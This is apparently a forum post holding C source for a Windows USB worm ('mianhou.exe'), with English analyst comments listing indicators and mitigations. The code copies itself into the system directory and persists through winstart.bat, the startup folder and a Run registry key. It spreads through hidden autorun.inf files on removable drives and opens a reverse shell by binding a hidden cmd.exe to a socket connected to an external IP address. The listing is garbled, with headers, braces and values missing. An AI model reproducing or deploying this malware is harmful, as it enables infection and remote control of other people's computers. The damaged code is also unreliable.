當然不是我寫的,但會仿寫:
#include "stdafx.h"
#include
#include
#include
#include
#include
#include
#pragma comment(lib,"ws2_32")
// Forward declarations and file-scope state for the listing below.
// NOTE(review): this page is extraction-damaged. Identifiers are lower-cased, the
// header names on the #include lines are gone, braces and several statement bodies
// are missing, and the `= ;` initializers have lost their values. It does not
// compile as shown and is annotated here for analysis only.
void initdata();
void virusfunc();
bool checkdisk();
void scandisk();
//void clipcursorr();
// keyproc has the parameter shape of a Windows hook procedure (presumably a keyboard
// hook, going by the name); no definition or installation call is visible on this page.
lresult callback keyproc(int code, wparam wparam, lparam lparam)
char szdrivername[4] = ;
// sztmp: virusfunc fills this with <system directory>\mianhou.exe, the host-side copy.
char sztmp[max_path] = ;
// usb: a single character whose address virusfunc passes to lstrcpy as the drive
// letter; presumably set by checkdisk/scandisk, whose bodies are not on the page.
char usb = 0;
// initdata: only the signature is present on the page; what it initialised cannot be
// determined from this listing.
void initdata()
//Virus characteristics (original author's summary): copies itself into the system directory and runs from there
//modifies the registry startup entries
//creates recyc1e. and autorun.inf on the USB drive
//writes the launch entries into autorun.inf
//adds some statements for controlling the computer
//
// Analyst summary of virusfunc, limited to what the visible lines show.
// Host-side artifacts to hunt for:
//   - mianhou.exe under the system directory (path built from getsystemdirectory)
//   - c:\windows\winstart.bat containing a line that launches system32\mianhou.exe
//   - mianhou.exe in the All Users start-menu startup folder
//   - value "1" under HKCU software\microsoft\windows\currentversion\policies\explorer\run
// Removable-media artifacts:
//   - autorun.inf in the drive root and a directory named "recyc1e." (digit 1, not the
//     letter l) holding mianhou.exe, both marked hidden + system + read-only
// Network artifact:
//   - outbound TCP to the address and port printed below, with a hidden cmd.exe whose
//     standard handles are bound to that socket
// Mitigation: keep AutoRun disabled for removable drives (NoDriveTypeAutoRun policy),
// alert on writes to Run keys and startup folders, and restrict outbound connections
// from workstations to unexpected ports.
void virusfunc()
;char szname[max_path] = "mianhou.exe";
// szpath = path of the running image; sztmp = <system directory>\mianhou.exe.
getmodulefilename(null, szpath, max_path);
getsystemdirectory(sztmp, max_path);
lstrcat(sztmp, "\\");
lstrcat(sztmp, szname);//USB drive -> host infection: szpath is the virus path, sztmp is where the virus sits after infecting the computer
// Non-zero means the image is not yet running from the system-directory path.
// NOTE(review): the braces and the copy/execute statements of this branch are missing
// from the page, so where the branch ends cannot be told from the listing.
if ( lstrcmpi(sztmp, szpath))
//copy itself into the system directory and run it
//sztmp[2] = '\0';
//lstrcat(sztmp, "windows");
char sztmp1[max_path];//sztmp1 is the winstart.bat file in the windows directory; it is modified so the virus starts automatically
char sztmp2[max_path];
sprintf(sztmp1,"c:\\windows\\winstart.bat");
//createfile(sztmp1, generic_write, file_share_write, 0, create_always, 0, 0);
// Persistence 1: winstart.bat is rewritten with a single launch line.
// The fopen result is used unchecked and no fclose is visible on the page.
file *bat;
bat = fopen(sztmp1,"w+");
fprintf(bat,"@ c:\\windows\\system32\\mianhou.exe\n");//virus auto-start
// Persistence 2: a copy in the All Users startup folder (localized folder names).
lstrcpy(sztmp2, "c:\\documents and settings\\all users\\「開始」選單\\程式\\啟動\\mianhou.exe");
copyfile(szpath, sztmp2, false);//modify the startup items
dword dw;
// Persistence 3: value "1" = sztmp under the per-user Policies\Explorer\Run key.
// `key` is not declared in the visible lines.
if ( regcreatekeyex(hkey_current_user, "software\\microsoft\\windows\\currentversion\\policies\\explorer\\run", 0l, null, reg_option_volatile, key_all_access, null, &key, &dw) == error_success)
regsetvalueex(key, "1", 0, reg_sz, (byte *)sztmp, lstrlen(sztmp));
regclosekey(key);//modify the registry startup entry
dword mianhou1 = 0;
dword mianhou2 = 2;
sleep(10000);
dword dwsize = 2550;
char szstring[2550];
dword dwtype;
// NOTE(review): the Explorer\Advanced key is opened twice but the statements that used
// it are missing. Presumably mianhou1/mianhou2 were written as folder-view settings
// (e.g. hidden-file display); confirm against an intact copy before relying on this.
if( regopenkey(hkey_current_user, "software\\microsoft\\windows\\currentversion\\explorer\\advanced", &key) == error_success)
}if( regopenkey(hkey_current_user, "software\\microsoft\\windows\\currentversion\\explorer\\advanced", &key) == error_success)}
//host -> USB drive infection: produces two items, the autorun.inf file and the recyc1e. directory, and copies the virus into that directory
handle filehandle;
char filename[max_path];//filename is the location of autorun.inf
char filepath[max_path];//filepath is the location of recyc1e. on the USB drive
char exepath[max_path];//exepath is the location of mianhou.exe on the USB drive
lstrcpy(filepath, &usb);//get the drive letter of the USB drive
lstrcat(filepath, ":\\recyc1e.");
createdirectory(filepath, null);//create the folder
lstrcpy(exepath, filepath);
lstrcat(exepath, "\\mianhou.exe");
copyfile(sztmp, exepath, true);//copy the virus from the host into recyc1e. on the USB drive
lstrcpy(filename, &usb);
lstrcat(filename,":\\autorun.inf");
filehandle = createfile(filename, generic_write, file_share_write, 0, create_always, 0, 0);//create autorun.inf in the root of the USB drive
//filehandle = createfile(filename, generic_write, file_share_write, 0, create_new, 0, 0);
// The autorun.inf text points open=, a shell verb and shellexecute= at
// .\recyc1e.\mianhou.exe; these strings can serve as content signatures when
// scanning removable media.
char filecontent[max_path] = "[autorun] \n open=.\\recyc1e.\\mianhou.exe \n shell\\1=&開啟(o) \n shell\\1\\command=.\\recyc1e.\\mianhou.exe \n shellexecute=.\\recyc1e.\\mianhou.exe";
dword nwrite;
// The full max_path-sized buffer is written, so the file on disk is the text above
// followed by zero padding; no closehandle call is visible on the page.
writefile(filehandle, filecontent, max_path, &nwrite, null); //write the contents of autorun.inf
setfileattributes(filename, file_attribute_hidden|file_attribute_system|file_attribute_readonly);
setfileattributes(filepath, file_attribute_hidden|file_attribute_system|file_attribute_readonly);//set the attributes of the autorun.inf file and the recyc1e. directory to system, read-only and hidden
// Network stage: a TCP socket is connected to the address and port below, then cmd.exe
// is started hidden with stdin/stdout/stderr set to that socket, which gives the remote
// endpoint an interactive command shell on the host. Return values of wsastartup,
// wsasocket and connect are not checked.
// Detection: a windowless cmd.exe holding a socket as its standard handles, spawned by
// an unexpected parent, together with the outbound connection itself.
wsadata ws;
socket s;
int ret;
wsastartup(makeword(2,2), &ws);
s = wsasocket(pf_inet, sock_stream, ipproto_tcp, null, 0, 0);
struct sockaddr_in server;
server.sin_family = af_inet;
server.sin_port = htons(830);
server.sin_addr.s_addr = inet_addr("28.53.217.111");
connect(s, (struct sockaddr *)&server, sizeof(server));
startupinfo si;
zeromemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwflags = startf_useshowwindow|startf_usestdhandles;
si.wshowwindow = sw_hide;
si.hstdinput = si.hstdoutput = si.hstderror = (void *)s;
char cmdline = "cmd.exe";
process_information processinformation;
// The fifth argument (1) enables handle inheritance, which is what passes the socket to
// the child process.
ret = createprocess(null, cmdline, null, null, 1, 0, null, null, &si, &processinformation);
// checkdisk: only the signature and a trailing `return false;` remain on the page. The
// stray `}` characters are leftovers of the original brace structure; what the function
// tested cannot be determined from this listing.
}bool checkdisk()
}return false;
// scandisk: signature only; no body is present on the page.
}void scandisk()
// winmain: program entry point. Only the parameter list is present, so the order in
// which the routines above were called cannot be determined from this page.
}int apientry winmain(hinstance hinstance,
hinstance hprevinstance,
lpstr
lpcmdline,
int
ncmdshow)